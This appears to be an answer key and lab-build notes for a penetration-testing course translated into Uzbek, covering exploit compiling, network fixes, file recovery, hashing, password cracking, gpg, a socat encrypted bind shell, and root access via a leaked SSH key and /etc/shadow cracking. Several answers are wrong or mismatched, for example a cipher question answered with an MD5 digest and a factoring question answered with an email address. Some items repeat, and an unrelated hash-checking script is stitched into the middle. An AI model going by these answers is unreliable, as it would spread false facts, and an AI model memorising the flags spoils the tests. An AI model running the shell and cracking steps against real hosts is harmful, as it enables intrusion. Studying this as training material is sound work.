The user logs in to the system with the credentials haad:haad. Inside the /home/haad/CrazyCode/ folder, the file contains this (⬆️) code. If the user fixes all the errors, the flag is given.
The flag must be in Uzbek. To do this, you first understand the code's algorithm and then change lines 9-25!
15.4.1
1
What is the first step we should take when trying to compile exploit code?
A. Compile it with built-in tools
B. Type the error code in a search engine
C. Review the code to observe if it will harm us or our machine when compiled
D. Turn off the computer and turn it back on again
What step should we take first when trying to compile exploit code?
A. Compile it with built-in tools
B. Enter the error code into a search engine
C. Review the code to see whether it could harm us or our device when compiled
D. Turn the computer off and on again
Answer: C
2
When code doesn't compile correctly, what is the first thing we should try?
A. Add a semicolon to the end of the main statements
B. Type the error code in a search engine
C. Call a friend
D. Remove lines of code that seem strange
When code does not compile correctly, what should we do first?
A. Add a semicolon to the end of the main statements
B. Enter the error code into a search engine
C. Call a friend
D. Remove lines of code that look strange
Answer: B
3
Sometimes a library isn't available on the host when we are compiling the code. What can we do in this case?
A. Install a package that contains the library file
B. Delete the code
C. Choose a different language and rewrite the program from scratch
D. Walk away knowing this issue is impossible to fix
Sometimes a library is not available on the host when compiling code. What can we do in this case?
A. Install a package that contains the library file
B. Delete the code
C. Choose a different language and rewrite the software from scratch
D. Give up on the work, knowing that this problem cannot be solved
Answer: A
4
Mistakes while coding happen often. What is the quickest way to identify where there may be a syntax error in the code?
A. Review the program line by line
B. Research the issue we think is happening
C. The error is always on line 42
D. Read the error message and look for the reported line number the issue is found
Mistakes happen often when writing code. What is the quickest way to identify where a syntax error in the code may be?
A. Review the program line by line
B. Research the problem we think is happening
C. The error is always on line 42
D. Read the error message and look for the line number where the problem was found
Answer: D
5
To get started, ssh into the exercise host with "offsec:offsec".
From there, navigate into the BrokenCompile directory and attempt to compile the C code with the following command: "gcc -Wall -o test CompileMe.c -lcrypto -lssl." Troubleshoot the issues until you can successfully compile the code. When the problems are resolved, the flag will be in the /home/offsec directory. If a lock error comes up, run 'sudo kill -9 PID', replacing "PID" with the process ID shown in the error message.
Hint: The offsec has sudo privileges for a couple of commands that may help resolve the issue on the host.
To begin, SSH into the exercise host using the credentials "Haad:Haad".
After that, go to the **BrokenCompile** directory and try to compile the C code with the following command:
`gcc -Wall -o test CompileMe.c -lcrypto -lssl`
Keep fixing errors until you have resolved the issues. Once the problems are resolved, the flag will be in the **/home/offsec** directory. If a "lock error" occurs, run the following command, replacing "PID" with the process ID shown in the error message:
`sudo kill -9 PID`
Hint: The **Haad** account has sudo privileges for several commands that may help resolve the issue on the host.
Answer: TROUBLESHOOT{W3_G0tz_Th3_L1b}
Scenario
The user logs in to the system with the credentials haad:haad. Inside the /home/haad/BrokenCompile/ folder, the CompileMe.c file contains this (⬆️) code. If the user fixes all the errors, the flag is given.
1. Some tools will be missing on the server. The haad user must be given the rights to download them
2. After the user fixes the syntax errors in the code, they compile it with gcc -Wall -o test CompileMe.c -lcrypto -lssl. If that succeeds, a file named /home/haad/FLAG appears
15.5.1
1
When diagnosing a network issue, what is the first step that should be taken? (Enter the letter corresponding to the answer)
A. Reboot the computer
B. Check if all of the cables are plugged in correctly
C. Run ipconfig to determine the IP address
D. ping
When diagnosing a network problem, which step should be taken first? (Enter the letter corresponding to the answer)
A. Reboot the computer
B. Check that all cables are plugged in correctly
C. Run the ipconfig command to determine the IP address
D. Run the command `ping google.com`
Answer: B
2
If there is power going to a computer and all cables are connected properly, what is a good question to ask when having a network problem? (Enter the letter corresponding to the answer)
A. What changed since the last time this was working?
B. Is there a problem with my hard drive?
C. Are the cables plugged in correctly?
D. Is the processor working?
If power is reaching the computer and all cables are connected properly, what is a good question to ask when a network problem occurs? (Enter the letter corresponding to the answer)
A. What has changed since it was last used?
B. Is there a problem with the hard drive?
C. Are the cables plugged in correctly?
D. Is the processor working?
Answer: A
3
A statically configured IP can cause a computer to lose internet connectivity. (True/False)
Answer: True
4
Which of the following is the issue if a computer can reach a website by IP but not name? (Enter the letter corresponding to the answer)
A. Routing
B. The switch
C. DNS
D. The network interface card (NIC)
Answer: C
5
If the computer can reach the internet and other hosts but not a specific internal host, what may be the problem? (Enter the letter corresponding to the answer)
A. Routing
B. The switch
C. DNS
D. The network interface card (NIC)
Answer: A
6
To begin, ssh into the exercise host with "Haady:HaAdy00".
The exercise host can't reach www.red0troubleshoot.com. The host has an internal DNS server at 127.0.0.1. Find out what the issues are with this connection, fix them, and get the flag by running curl http://www.red0troubleshoot.com.
Hint: Did you check the routing table?
You can find the IP of the web server after adding the correct DNS entry in the resolv.conf file.
In the Uzbek version of this task, the SSH login credentials are "haad:Haad".
Answer: TROUBLESHOOT{Muammo_HECH_QACHON_Tarmoq_Emas}
Scenario
1. The user logs in to the system over SSH (Haad:Haad).
2. The user must have permission to edit the /etc/resolv.conf file.
3. The user must have permission to edit the network interfaces.
4. The user cannot reach this site. On the server, the website is running on another interface. On the machine, that interface must not be in the routing table! If the user adds it to the routing table, they gain access to the network running on the second interface.
5. The flag is on the website.
15.6.1
1
Deleting a file from any computer is unrecoverable. (True/False)
Answer: False
2
When a critical mistake happens, what is the first thing we should do?
A. Stop and breathe
B. Panic
C. Seek help
D. Write a resignation letter
Answer: A
3
There is only one way to recover a deleted file. (True/False)
Answer: False
4
The actions taken after a file is deleted are important to consider to be able to recover the file. (True/False)
Answer: True
5
Which of the following is a file recovery tool? (Enter the letter corresponding to the answer)
A. Kismet
B. nmap
C. Wireshark
D. foremost
Answer: d
6
To begin, ssh into the exercise host with haad:haad.
NOTE: Please revert this machine before doing this particular exercise. A jpg file has been deleted from the exercise host. Using what you learned in this section, recover that file. The offsec user has sudo privileges for what is needed and a special script called "chownHomeDir.sh" will change the ownership of the offsec directory to haad:haad. The flag will be in the recovered image.
Hint: Navigate to where the image is at and run "python -m SimpleHTTPServer". From there, you can open a web browser on your Kali host and enter the host IP on port 8000. As an example, if my host is 192.168.50.65, I would enter 192.168.50.65:8000.
Take a look at how this host is partitioned. Are you looking in the right one?
Pay attention to the type of file being recovered.
In the Uzbek version of this task, the **haad** user has the sudo privileges that are needed, and **chownHomeDir.sh** changes the ownership of the **haad** directory to **haad:haad**.
Answer: TROUBLESHOOT{Siz_Mening_Qutqaruvchimisiz}
Scenario
1. The foremost tool must be installed on the system, and the haad user must have permission to use it.
2. With this tool the user recovers the deleted images.
3. There is a script in the /home/haad/ folder. The user is given permission to run this script with root privileges. The script transfers ownership of everything that belongs to the root user to the haad user.
4. You (the developers) upload 2 images to the system and delete them when the user logs in. After recovering them, the user can download them.
Starting a temporary web server
Downloading the images to the user's own machine
16. Cryptography
16.2.1
1
What is 234 decimal in binary?
Answer: 11101010
2
What is 10010101 binary in decimal?
Answer: 149
3
What is the subnet mask represented by 11111111.11111111.11100000.00000000?
Answer: 255.255.224.0
4
How many network bits are ones in the subnet mask of 255.128.0.0?
Answer: 9
16.2.2
1
What is 0xA1 in decimal?
Answer: 161
2
What is 162 in hexadecimal?
Answer: A2
3
Let's review a sample TCP header's hexdump. Map the dump with the TCP header structure and answer the following questions.
The TCP header structure is in Figure 2 on the following Nmap Website page: https://nmap.org/book/tcpip-ref.html
What is the source port number in decimal?
Answer: 60946
4
What is the destination port number in decimal?
Answer: 443
5
What is the acknowledgment number in decimal?
Answer: 0
16.3.1
1
According to ASCII, what is the "R" character in hexadecimal?
Answer: 52
2
According to ASCII, what character is decimal 40 (28 in hexadecimal)?
Answer: (
3
According to ASCII, what control character is decimal 10 (0A in hexadecimal)?
Answer: LF
4
Decode the following hexadecimal numbers to ASCII characters:
hint: You can leverage xxd's reverse operation.
Answer: HD{d2cd8253361a9c732d21ca1d336599cc}
Scenario
48447B64326364383235333336316139633733326432316361316433333635393963637D
This is the haad flag.
5
Convert the encoded.file file into a readable format. The solution to the exercise is the ASCII equivalent of the contents of the decoded file.
Answer: ACED
Scenario
The user is given encoded.file and must work out the required format and decode it.
16.3.2
1
On Kali Linux, Base64 decode the linux_base64 file.
Answer: HD{bmljZSBqb2Ih}
Scenario
The user is given the linux_base64 file. The file holds this content ⬇️, but in the file it must be Base64-encoded.
2 (modified)
Base64 encode the following string on Kali Linux: "Offensive Security".
hint: Make sure to exclude the new line character when encoding.
Modified version: Base64 encode the following string on Kali Linux: "Haad Training Center".
Answer: SGFhZCBUcmFpbmluZyBDZW50ZXIK
16.3.3
1
Base64 encode the final-encoding-exercise file to transfer it to your Kali workstation. What are the last six characters of this file after it has been Base64 encoded?
Answer: AAAA==
Scenario
The user is given the final-encoding-exercise file.
If the user Base64-encodes it, the output ends in AAAA==.
2
Now decode this file and determine the file type. What type of file is it?
Answer: gzip
Scenario
The encoded.txt file must be decoded, and checking the result with the file command must report gzip:
`base64 -d encoded.txt > decoded-file`
`file decoded-file`
3
Based on the results above, you should be able to interact with this file to create another kind of file, which will allow you to read its contents. What was the original name of the new file?
hint:
The tool used to transform the file may require you to add a file extension to it. Remember to research anything that you don't understand!
Answer: super-secret-file
Scenario
The file restored above must be saved under another name, for example with a .txt extension; when it is then opened, "super-secret-file" must appear.
4
Finally, decode the provided text. What is the resulting flag?
Answer: HD{Men-Kodlash-Bo‘yicha-Mutaxassisman!}
Scenario
Not shown in the video.
16.4.1
1
On the Kali Linux VM, create a file with the name test.txt by redirecting the output of the "echo test" command to it. What is the MD5 hash of the test.txt file we created?
hint: Use the md5sum utility
Answer: d8e8fca2dc0f896fd7cb4cb0031ba249
Scenario
The user performs this on their own.
2
Without changing the content of the file, rename the test.txt file we created to test2.txt. What is the hash of the test2.txt file?
Answer: d8e8fca2dc0f896fd7cb4cb0031ba249
Scenario
The user performs this on their own.
3
Create a new file with the name test3.txt by redirecting the output of the "echo test." command to it (notice the dot after the word test). What is the md5sum hash of this file?
Answer: 4cc5a1d62b276a076e5b06b0df7efd27
Scenario
The user performs this on their own.
4
How many characters are the md5sum digests in the previous exercises?
Answer: 32
Scenario
The user performs this on their own.
5
Generate a large file with 8 MB of content and name it randomfile. To do this, use the following command: `dd if=/dev/urandom of=randomfile bs=4M count=2`. Then, calculate the MD5 hash of this file. How many characters does the digest consist of?
Answer: 32
Scenario
The user performs this on their own.
6
We can pipe a string to the wc command with the -c switch to count the number of characters in the string. Use the following command to count the number of characters in the digest. echo d8e8fca2dc0f896fd7cb4cb0031ba249 | wc -c . How many characters are in this digest?
Answer: 33
Scenario
The user performs this on their own.
7
You may recall that the echo command automatically appends an invisible newline character. This character is counted by the wc utility and should explain the unexpected result.
Repeat the steps above but use the -n switch to avoid including the new line character. Run the command `echo -n d8e8fca2dc0f896fd7cb4cb0031ba249 | wc -c`. What is the result once we remove the new line character?
Answer: 32
Scenario
The user performs this on their own.
16.4.3
1
Find the SHA-256 hash of the string "Th151sth3fl4g". Calculate the hash on a Linux VM with the help of sha256sum and echo. Be aware of the postfix new line character of the echo command.
Answer: 2eea341c3610d93c4428d8c49666c08ff0f09f122fb2254607bc4f0f0946ff00
Scenario
The user performs this on their own.
2
Find the SHA-1 sum of the string "Th151sth3fl4g". As before, calculate the hash on a Linux VM, but use sha1sum.
Answer: 4c61cc89516237aff7d9319cde9ecb5c5290a792
Scenario
The user performs this on their own.
3
Start the target Linux VM and execute the following command from the terminal: echo -n "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua" > loremipsum.txt .
Calculate the SHA512 sum of the file loremipsum.txt.
hint: Copy and paste the command from the question. The '-n' option is important, as well.
Answer: 871823e834a9210fb299f87ae7ec48d3ff8ca16119849d678b60ddb3bdc0eb5508a747913f01bb84733bbea1652356eedd37b33fd26b59e10904934bd2937aa3
Scenario
The user performs this on their own, but it must be done inside the VM!
4
There are three files with known checksums in the /home/apprentice/hashcheck folder. One of the files was changed after the checksums were calculated and stored in files.sha256. What is the new checksum of the file that was modified?
Answer: 735355062f5c15899c2f545f09d43a104068d9204422756651c558b43683b12b
Scenario
How it is built has been shown.
5
In /usr, there is a malicious file that matches this hash: "d61d579501ab8ff507120780191929d5" . Your task is to find the file. The command should run for no longer than one minute. What is the full path to the location of the malware?
hint:
Try researching how you can use the find command to do this.
Answer: /usr/bin/virus
Scenario
The /usr/bin/virus file contains a single simple script. Its md5sum hash is given to the user. The user searches for the file, finds it, and gives its full path.
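The two integrity tasks above (identifying the file that changed after `files.sha256` was written, and locating a file under a directory tree from a known MD5) can be scripted as follows. This is an added example, not part of the lab or its answer key; the function names and the sample tree built by `make_fixture` are constructed for illustration.

```shell
#!/bin/sh
# Added example. Function names and the sample tree are constructed for
# illustration; they are not part of the lab.

# find_modified MANIFEST
# Re-hash each file listed in a sha256sum-format manifest (paths relative to
# the manifest's directory) and print "<name> <current-digest>" for every
# file whose digest no longer matches, or "<name> MISSING" if it is gone.
find_modified() {
    fm_dir=$(dirname "$1")
    while read -r fm_want fm_name; do
        [ -n "$fm_name" ] || continue
        fm_name=${fm_name#\*}                 # drop sha256sum's binary-mode marker
        if [ ! -f "$fm_dir/$fm_name" ]; then
            printf '%s MISSING\n' "$fm_name"
            continue
        fi
        fm_got=$(sha256sum "$fm_dir/$fm_name" | cut -d' ' -f1)
        [ "$fm_got" = "$fm_want" ] || printf '%s %s\n' "$fm_name" "$fm_got"
    done < "$1"
}

# find_by_md5 DIR MD5
# Print the path of every regular file under DIR whose MD5 digest equals MD5.
# -xdev keeps the sweep on one filesystem; "-exec ... +" batches the files so
# md5sum is started once per batch instead of once per file.
find_by_md5() {
    fb_want=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    find "$1" -xdev -type f -exec md5sum {} + 2>/dev/null |
        awk -v want="$fb_want" '
            # ($1 "") forces a string comparison even for all-digit digests
            ($1 "") == want { sub(/^[0-9a-f]+ [ *]/, ""); print }'
}

# make_fixture DIR
# Build a constructed sample tree: three hashed files, one of which is
# changed after the manifest is written, plus a small tree to sweep.
make_fixture() {
    mkdir -p "$1/hashcheck" "$1/usr/bin" "$1/usr/share/doc"
    printf 'alpha\n'   > "$1/hashcheck/a.txt"
    printf 'bravo\n'   > "$1/hashcheck/b.txt"
    printf 'charlie\n' > "$1/hashcheck/c.txt"
    ( cd "$1/hashcheck" && sha256sum a.txt b.txt c.txt > files.sha256 )
    printf 'tampered\n' >> "$1/hashcheck/b.txt"   # change made after hashing
    printf 'test\n'   > "$1/usr/bin/sample"       # same bytes as "echo test"
    printf 'readme\n' > "$1/usr/share/doc/README"
}

# Run "sh thisfile demo" to see both checks on the constructed tree.
if [ "${1:-}" = demo ]; then
    demo_dir=$(mktemp -d) && make_fixture "$demo_dir"
    find_modified "$demo_dir/hashcheck/files.sha256"
    find_by_md5 "$demo_dir/usr" d8e8fca2dc0f896fd7cb4cb0031ba249
    rm -rf "$demo_dir"
fi
```

On a real host, `sha256sum -c files.sha256` reports which entry fails; `find_modified` additionally prints the current digest of the changed file.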
16.5.1
1
Which hashing algorithm generated the following hash?
Answer: NTLM
Scenario
The user performs this on their own.
2
What is the current default hashing algorithm for kali?
Answer: MD5
Scenario
The user performs this on their own.
3
Which hashing algorithm generated the following hash?
Answer: NTLM
Scenario
The user performs this on their own, but it must be done inside the VM!
4
Which hashing algorithm generated the following hash?
Answer: NTLM
Scenario
The user performs this on their own.
5
Crack the following hash using https://crackstation.net/
Answer: password123
Scenario
The user performs this on their own.
6
Crack the following hash using https://crackstation.net/
Answer: password12345
Scenario
The user performs this on their own, but it must be done inside the VM!
7
Which hashing algorithm generated the hash from the previous exercise?
Answer: NTLM
Scenario
The user performs this on their own.
8
What is the current default hashing algorithm on Windows?
Answer: NTLM
Scenario
The user performs this on their own.
16.5.2
1
This is a line taken from an /etc/shadow file:
What is the salt used in this password?
hint:
https://unix.stackexchange.com/questions/642570/the-format-of-encrypted-password-in-etc-shadow
In the above link, the salt for the question is F5Jx5fExrKuPp53xLKQ..1
The answer should not have the $ and should include the /
Answer: 0WzBWAjJ52qoJ3iqHwwWI/
Scenario
The user performs this on their own.
2
Create a salted hash using the SHA-512-based crypt of password "foobar" with the salt "M3vwJPAueK2a1vNM".
hint: Use the mkpasswd tool on the Kali Linux VM to generate the salted password hash.
Answer: $6$M3vwJPAueK2a1vNM$uILLUy6MrFVQEJWIy8dw94oMfdy1fuHKk.yGDk89S14k3UbK3Em0wlanQAJ1RhicTH2OOsrhfMpaNnQS0s.C60
Scenario
The user performs this on their own.
16.5.3
1
Use John the Ripper on the Kali Linux VM to crack the following hash:
Answer: $$spongebob13$$
Scenario
The user performs this on their own.
2
Use John the Ripper on the Kali Linux VM to crack the following hash:
Answer: princess1
Scenario
The user performs this on their own.
3
Use John the Ripper on the Kali Linux VM to crack the following hash:
Answer: angel13
Scenario
The user performs this on their own.
16.5.3
1
Decode the following string with the ROT13 algorithm:
Answer: 153528a904b13716a8bb0e11693d9768a2fc8a7c38d879bcc930f707013eff03
Scenario
The user performs this on their own.
16.6.5
1
Encrypt the file called secret-message with AES256 using gpg. Before you encrypt it, make sure the name is "secret-message" and not the generated name after downloading it. Also, provide the password 'test' when prompted. How large in bytes is the output file after the encryption algorithm is applied?
Answer: 120
Scenario
The user is given a file named secret-message.
How to do it has been shown.
2
Does the length of a particular key impact the length of the output ciphertext?
Answer: no
Scenario
The user performs this on their own.
3
Examine the file called decrypt-me.gpg. Which cipher was used to encrypt this file?
Answer: 4cc5a1d62b276a076e5b06b0df7efd27
Scenario
4
Decrypt the decrypt-me.gpg file with the password "thiskeyis100%secure", and retrieve the flag!
Answer: HD{simmetrikshifrlash}
Scenario:
(How the file is built is described in the previous scenario.)
The user performs this on their own.
5
Another application of symmetric encryption can be found within the VPN to this very lab! Download the universal.ovpn VPN pack to connect to this lab, and examine the contents with the cat command. How many bits is the OpenVPN static key inside the file?
Answer: 32
Scenario
This file is given to the user.
6
Which encryption cipher does the VPN use?
hint: Review the openvpn output.
Answer: AES-128-CBC
Scenario
The user performs this on their own.
16.7.2
1
Download and import the key-pair belonging to Melaine. What email address was used to generate the key-pair?
hint: Use the "--import" flag to import the keys to your local GPG keychain.
Answer: melanie@example.com
Scenario
The user performs this on their own.
2
Use the passphrase "princess123" to decrypt flag.gpg. What is the flag?
Answer: HD{Qirollik-uchun-bayroq}
Scenario
The flag is placed in the comment field.
16.7.3
1
Given the product N = 382387, what are its prime factors p and q? Enter the answer in the format "123 456"
Answer: melanie@example.com
Scenario
The user performs this on their own.
2
Use the passphrase "princess123" to decrypt flag.gpg. What is the flag?
Answer: HD{Qirollik-uchun-bayroq}
Scenario
The flag is placed in the comment field.
16.7.4
1
Use the web-based Kali browser VM to generate an SSH key-pair for the kali user. What is the full path of the default generated private key?
Answer: /home/kali/.ssh/id_ed25519
Scenario
Not shown in the video.
2
When copying a key to a remote server, should we copy over our private key or public key?
Answer: public
Scenario
The user performs this on their own.
3
After following the instructions to create the authorized_keys file during SSH key generation, use the diff command with the -s flag to compare it with id_rsa.pub. What is the last word of the output of this command?
Answer: identical
Scenario
Not shown in the video.
16.7.5
1
Open an encrypted bind shell to the target machine on TCP port 4443 and obtain the flag.
Answer: HD{kriptografik-qobiqchalar-quvonchli}
Scenario
When the user obtains a shell from their own shell with the following command, it should give them the flag HD{kriptografik-qobiqchalar-quvonchli}:
`socat - OPENSSL:target_ip:4443,verify=0`
2
Generate a certificate and then start a listener on your attacking machine. Supply the IP address and port number your listener is running on to the /home/apprentice/flag binary to obtain the flag.
Answer: HD{kriptografik-qobiqchalar-saranjom}
Scenario
First, a certificate must be generated.
The user keeps a listener for the shell running on the attack target, and when the flag file at /home/apprentice/flag is run as ./flag target_ip port, it must return the flag HD{kriptografik-qobiqchalar-saranjom}.
16.7.6
1
Decrypt the http_basic_auth.pcap packet capture with the help of the http_basic_auth.key.txt log file that contains the per-session secrets keys. Find the content of the downloaded secret.txt file in the traffic capture.
Answer: Bu_bir_flag
Scenario
The user performs this on their own.
2
What password was provided for the Basic Authentication in the traffic capture?
Answer: m6n6k5l1t
Scenario
The user performs this on their own; it relates to the file.
3
What is the value of the Common Name in the subject field of the server provided certificate?
Answer: b@yr0q_q6bul_q1l1na7ak
Scenario
The user performs this on their own.
16.8.1
1
Access the victim target using the credentials apprentice:kadabra. Obtain the flag hiding in the apprentice's mailbox.
Answer: HD{Oddiy-matn-hujjat-formati}
Scenario
Inside the /var/mail/ folder there must be a file named apprentice, and that file must contain Base64 code; converting that code to PDF format must yield the flag HD{Oddiy-matn-hujjat-formati}.
2
Obtain the private SSH key hiding in the user's mailbox. Decode the key and use it to gain root access on the victim machine. What is the md5sum of the unencrypted file in /root?
Answer: fcbb73e413bd7745f1612c7c31c63fff
Scenario
The apprentice file above must also contain a key for id_rsa. The key must be Base64-decoded and saved to an id_rsa file, and after connecting as root with this id_rsa there must be a megic.txt file. Running md5sum megic.txt must return this value: fcbb73e413bd7745f1612c7c31c63fff
3
Decrypt the encrypted file in /root. What is the flag?
Answer: HD{Hatto-sehrgarlar-ham-entropiyaga-muhtoj}
Scenario
/root must contain the file SeeNoEvil.txt.gpg. Running gpg --decrypt SeeNoEvil.txt.gpg must yield the flag HD{Hatto-sehrgarlar-ham-entropiyaga-muhtoj}.
4
Finally, extract /etc/shadow and crack the passwords. What is root's password?
Answer: spellbound
Scenario
Cracking root's password from the /etc/shadow file with john or another cracking tool must yield the password spellbound.